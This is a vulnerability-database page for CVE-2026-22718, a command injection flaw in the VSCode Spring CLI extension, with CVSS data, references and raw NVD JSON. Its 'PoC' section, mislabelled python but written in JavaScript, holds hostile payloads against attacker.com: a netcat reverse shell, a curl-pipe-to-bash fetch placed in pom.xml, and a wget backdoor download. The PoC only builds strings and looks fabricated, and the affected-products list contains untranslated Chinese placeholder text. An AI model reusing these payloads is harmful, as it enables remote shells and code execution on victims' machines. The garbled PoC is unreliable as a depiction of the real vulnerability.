CVE-2026-22718

Description

The VSCode extension for Spring CLI are vulnerable to command injection, resulting in command execution on the users machine.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

VSCode Spring CLI extension < 修复版本

Spring CLI < 3.0.x

所有支持本地命令执行的VSCode Spring扩展版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22718 PoC - VSCode Spring CLI Extension Command Injection
// This PoC demonstrates the command injection vulnerability in VSCode Spring CLI extension

// Malicious payload that can be injected into Spring project configuration files
const maliciousPayload = {
  // Inject into application.properties
  'application.properties': `
    spring.config.location=;echo${IFS}compromised${IFS}>/tmp/pwned
    spring.datasource.url=jdbc:postgresql://;nc${IFS}-e${IFS}/bin/bash${IFS}attacker.com${IFS}4444
  `,
  // Inject into pom.xml as malicious plugin configuration
  'pom.xml': `
    <plugin>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-maven-plugin</artifactId>
      <configuration>
        <executable>true</executable>
        <arguments>--server.port=$(curl${IFS}http://attacker.com/shell.sh|bash)</arguments>
      </configuration>
    </plugin>
  `,
  // Inject via environment variable manipulation
  'envInjection': `
    SPRING_CONFIG_ADDITIONAL_LOCATION=;wget${IFS}http://attacker.com/backdoor${IFS}-O${IFS}/tmp/backdoor
  `
};

// Attack scenario:
// 1. Attacker creates a malicious Spring project or modifies existing project files
// 2. Victim opens the project in VSCode with vulnerable Spring CLI extension
// 3. Extension parses malicious configuration
// 4. Commands are injected and executed via system shell

console.log('CVE-2026-22718 Command Injection Payload Generated');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22718
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22718
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22718/
[4] VulDB https://vuldb.com/cve/CVE-2026-22718
[5] https://spring.io/security/cve-2026-22718

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22718", "sourceIdentifier": "[email protected]", "published": "2026-01-14T05:16:34.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VSCode extension for Spring CLI are vulnerable to command injection, resulting in command execution on the users machine."}, {"lang": "es", "value": "La extensión de VSCode para Spring CLI es vulnerable a inyección de comandos, resultando en la ejecución de comandos en la máquina del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://spring.io/security/cve-2026-22718", "source": "[email protected]"}]}}